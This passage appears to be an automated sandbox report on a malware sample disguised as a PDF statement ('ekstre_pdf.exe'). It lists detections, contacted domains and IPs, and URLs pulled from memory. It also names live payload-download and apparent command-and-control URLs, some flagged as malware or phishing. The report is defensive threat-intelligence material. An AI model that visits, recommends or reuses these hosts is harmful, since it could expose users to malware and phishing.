4.2.cmd.exe.359f840.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
athle91.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.zetuinteriors.africa/mi94/www.bellvaniamail.com	0%	Avira URL Cloud	safe
http://www.xqan.net/mi94/?_N6l56=RQIqCfU6yca9MG4/XS5zNeloaytkpqyXcIIi0Y1m1ICwL0CZtYYawds0pYmBK3GbRdzS&3fK0g=JxoL4	0%	Avira URL Cloud	safe
http://34.138.169.8/.bin	0%	Avira URL Cloud	safe
http://www.kevinjasperinc.africa/mi94/www.hanfengmeiye.com	0%	Avira URL Cloud	safe
http://www.luivix.online/mi94/	0%	Avira URL Cloud	safe
http://www.credit-cards-54889.com/mi94/	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin2	100%	Avira URL Cloud	malware
http://www.iltuosentiero.com/mi94/	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin8	100%	Avira URL Cloud	malware
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin/	100%	Avira URL Cloud	malware
http://www.furniture-42269.com	100%	Avira URL Cloud	malware
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.tmcgroup.africa/mi94/	0%	Avira URL Cloud	safe
http://www.credit-cards-54889.comReferer:	0%	Avira URL Cloud	safe
http://www.anotherworldrecord.comReferer:	0%	Avira URL Cloud	safe
http://www.xqan.net/mi94/www.anjin98.com	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
http://www.hanfengmeiye.com/mi94/	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.tmcgroup.africaReferer:	0%	Avira URL Cloud	safe
http://www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4	0%	Avira URL Cloud	safe
http://www.anotherworldrecord.com/mi94/?3fK0g=JxoL4&_N6l56=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H	100%	Avira URL Cloud	malware
http://www.jewelry2adore.biz/mi94/	0%	Avira URL Cloud	safe
http://www.athle91.comReferer:	0%	Avira URL Cloud	safe
http://www.anjin98.com/mi94/www.kevinjasperinc.africa	0%	Avira URL Cloud	safe
http://www.tmcgroup.africa	0%	Avira URL Cloud	safe
http://www.anjin98.comReferer:	0%	Avira URL Cloud	safe
http://www.sneakersuomo.com/mi94/www.zetuinteriors.africa	0%	Avira URL Cloud	safe
http://www.iltuosentiero.com/mi94/?3fK0g=JxoL4&_N6l56=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW	0%	Avira URL Cloud	safe
http://www.centracul.online/mi94/	100%	Avira URL Cloud	phishing
http://www.licensescape.com/mi94/?_N6l56=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&3fK0g=JxoL4	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bino	100%	Avira URL Cloud	malware
https://word.office.comj	0%	Avira URL Cloud	safe
http://www.jewelry2adore.bizReferer:	0%	Avira URL Cloud	safe
http://34.138.169.8/	0%	Avira URL Cloud	safe
http://www.bril-kre-l25.buzz/mi94/www.athle91.com	0%	Avira URL Cloud	safe
http://www.jenniferfalconerrealtor.com/mi94/?3fK0g=JxoL4&_N6l56=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23	0%	Avira URL Cloud	safe
http://www.anotherworldrecord.com/mi94/www.credit-cards-54889.com	100%	Avira URL Cloud	malware
http://www.zetuinteriors.africa/mi94/	0%	Avira URL Cloud	safe
http://www.xqan.net/mi94/	0%	Avira URL Cloud	safe
http://www.anotherworldrecord.com	0%	Avira URL Cloud	safe
http://www.anjin98.com/mi94/?hRrP=w48pM&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk/mi94/www.dinero.news	0%	Avira URL Cloud	safe
http://www.athle91.com/mi94/www.anjin98.com	0%	Avira URL Cloud	safe
http://www.centracul.online/mi94/www.iltuosentiero.com	100%	Avira URL Cloud	phishing
http://www.furniture-42269.com/mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL	100%	Avira URL Cloud	malware
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binQ	100%	Avira URL Cloud	malware
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binyj	100%	Avira URL Cloud	malware
http://www.jenniferfalconerrealtor.com/mi94/	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.ukReferer:	0%	Avira URL Cloud	safe
http://www.jewelry2adore.biz	0%	Avira URL Cloud	safe
http://www.bril-kre-l25.buzz/mi94/	0%	Avira URL Cloud	safe
http://www.luivix.onlineReferer:	0%	Avira URL Cloud	safe
http://www.iltuosentiero.com	0%	Avira URL Cloud	safe
http://www.dinero.news/mi94/www.tmcgroup.africa	0%	Avira URL Cloud	safe
http://www.sneakersuomo.comReferer:	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binC	100%	Avira URL Cloud	malware
http://www.kevinjasperinc.africa/mi94/	0%	Avira URL Cloud	safe
http://www.jenniferfalconerrealtor.comReferer:	0%	Avira URL Cloud	safe
http://www.furniture-42269.com/mi94/www.centracul.online	100%	Avira URL Cloud	malware
http://www.licensescape.com/mi94/www.jenniferfalconerrealtor.com	0%	Avira URL Cloud	safe
http://www.zetuinteriors.africa	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin;	100%	Avira URL Cloud	malware
http://www.tmcgroup.africa/mi94/www.zetuinteriors.africa	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk/mi94/	0%	Avira URL Cloud	safe
http://www.jenniferfalconerrealtor.com	0%	Avira URL Cloud	safe
http://www.healthinsurancearena.com	0%	Avira URL Cloud	safe
http://www.healthinsurancearena.com/mi94/www.furniture-42269.com	0%	Avira URL Cloud	safe
http://www.bellvaniamail.com/mi94/www.furniture-42269.com	0%	Avira URL Cloud	safe
http://www.dinero.news/mi94/?3fK0g=JxoL4&_N6l56=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub	0%	Avira URL Cloud	safe
http://www.anjin98.com/mi94/?3fK0g=JxoL4&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	100%	Avira URL Cloud	malware
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.hanfengmeiye.com/mi94/www.sneakersuomo.com	0%	Avira URL Cloud	safe
http://www.centracul.online	100%	Avira URL Cloud	phishing
http://www.athle91.com/mi94/?_N6l56=8SnTfj2AQcnQtN4WDHIwCOlzimaS2RQBhEdsYDfeFz6xJnDvY5Rr8DAdiOtS6w9Ok+SP&hRrP=w48pM	0%	Avira URL Cloud	safe
http://www.bril-kre-l25.buzzReferer:	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.jewelry2adore.biz/mi94/www.licensescape.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.hanfengmeiye.com	154.23.133.34	true	false		unknown
athle91.com	91.223.253.105	true	true	0%, Virustotal, Browse	unknown
www.xqan.net	38.163.115.131	true	true		unknown
parkingpage.namecheap.com	198.54.117.218	true	false		high
www.furniture-42269.com	185.53.179.90	true	true		unknown
www.licensescape.com	3.64.163.50	true	true		unknown
www.anjin98.com	160.121.87.199	true	true		unknown
lb-agent-dugout-pr.moxiworks.com	64.246.164.134	true	false		high
healthinsurancearena.com	66.29.154.110	true	true		unknown
www.credit-cards-54889.com	185.53.179.91	true	true		unknown
www.dinero.news	64.190.63.111	true	true		unknown
iltuosentiero.com	62.149.128.45	true	true		unknown
www.jewelry2adore.biz	204.11.56.48	true	true		unknown
www.zetuinteriors.africa	unknown	unknown	true		unknown
www.healthinsurancearena.com	unknown	unknown	true		unknown
www.iltuosentiero.com	unknown	unknown	true		unknown
www.athle91.com	unknown	unknown	true		unknown
www.bril-kre-l25.buzz	unknown	unknown	true		unknown
www.anotherworldrecord.com	unknown	unknown	true		unknown
www.jenniferfalconerrealtor.com	unknown	unknown	true		unknown
www.kevinjasperinc.africa	unknown	unknown	true		unknown
www.centracul.online	unknown	unknown	true		unknown
www.crosswalkconsulting.co.uk	unknown	unknown	true		unknown
www.tmcgroup.africa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.xqan.net/mi94/?_N6l56=RQIqCfU6yca9MG4/XS5zNeloaytkpqyXcIIi0Y1m1ICwL0CZtYYawds0pYmBK3GbRdzS&3fK0g=JxoL4	true	Avira URL Cloud: safe	unknown
http://www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4	true	Avira URL Cloud: safe	unknown
http://www.anotherworldrecord.com/mi94/?3fK0g=JxoL4&_N6l56=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H	true	Avira URL Cloud: malware	unknown
http://www.iltuosentiero.com/mi94/?3fK0g=JxoL4&_N6l56=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW	true	Avira URL Cloud: safe	unknown
http://www.licensescape.com/mi94/?_N6l56=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&3fK0g=JxoL4	true	Avira URL Cloud: safe	unknown
http://www.jenniferfalconerrealtor.com/mi94/?3fK0g=JxoL4&_N6l56=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23	true	Avira URL Cloud: safe	unknown
http://www.anjin98.com/mi94/?hRrP=w48pM&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX	true	Avira URL Cloud: safe	unknown
http://www.furniture-42269.com/mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL	true	Avira URL Cloud: malware	unknown
http://www.dinero.news/mi94/?3fK0g=JxoL4&_N6l56=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub	true	Avira URL Cloud: safe	unknown
http://www.anjin98.com/mi94/?3fK0g=JxoL4&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX	true	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	true	Avira URL Cloud: malware	unknown
http://www.athle91.com/mi94/?_N6l56=8SnTfj2AQcnQtN4WDHIwCOlzimaS2RQBhEdsYDfeFz6xJnDvY5Rr8DAdiOtS6w9Ok+SP&hRrP=w48pM	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://34.138.169.8/.bin	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.luivix.online/mi94/	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin8	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003C58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.iltuosentiero.com/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kevinjasperinc.africa/mi94/www.hanfengmeiye.com	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zetuinteriors.africa/mi94/www.bellvaniamail.com	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin2	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003C58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin/	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.credit-cards-54889.com/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.furniture-42269.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tmcgroup.africa/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.credit-cards-54889.comReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hanfengmeiye.com/mi94/	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/	explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 00000002.00000000.2982280367.000000001051F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.000000001051F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000626000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.xqan.net/mi94/www.anjin98.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.anotherworldrecord.comReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gopher.ftp://ftp.	ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tmcgroup.africaReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jewelry2adore.biz/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tmcgroup.africa	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sneakersuomo.com/mi94/www.zetuinteriors.africa	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSp	explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.anjin98.com/mi94/www.kevinjasperinc.africa	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athle91.comReferer:	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.centracul.online/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://api.msn.com/v1/news/Feed/Windows?UZ	explorer.exe, 00000002.00000000.2956783769.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7570471488.000000000906A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115944708.0000000008FC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440741929.0000000009069000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.anjin98.comReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.comj	explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bino	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/X	explorer.exe, 00000002.00000002.7553521751.0000000000497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2943488952.0000000000497000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jewelry2adore.bizReferer:	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?1	explorer.exe, 00000002.00000002.7558692050.0000000002A80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2947016680.0000000002A80000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://34.138.169.8/	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	ekstre_pdf.exe, 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ekstre_pdf.exe, 00000000.00000000.2497832838.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ekstre_pdf.exe, 00000001.00000000.2823324448.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://www.anotherworldrecord.com/mi94/www.credit-cards-54889.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.bril-kre-l25.buzz/mi94/www.athle91.com	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xqan.net/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zetuinteriors.africa/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.anotherworldrecord.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk/mi94/www.dinero.news	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athle91.com/mi94/www.anjin98.com	explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.centracul.online/mi94/www.iltuosentiero.com	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://android.notify.windows.com/iOS)A	explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binyj	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sedo.com/search/details/?partnerid=14453&language=d&domain=dinero.news&origin=parking&utm_me	explorer.exe, 00000002.00000002.7600570476.00000000119EF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.7565262572.0000000003A8F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binQ	ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003CBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.jenniferfalconerrealtor.com/mi94/	explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2967197468.000000000D033000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131449854.000000000D033000.00000004.00000001.00020000.00000000.sdmp	false		high
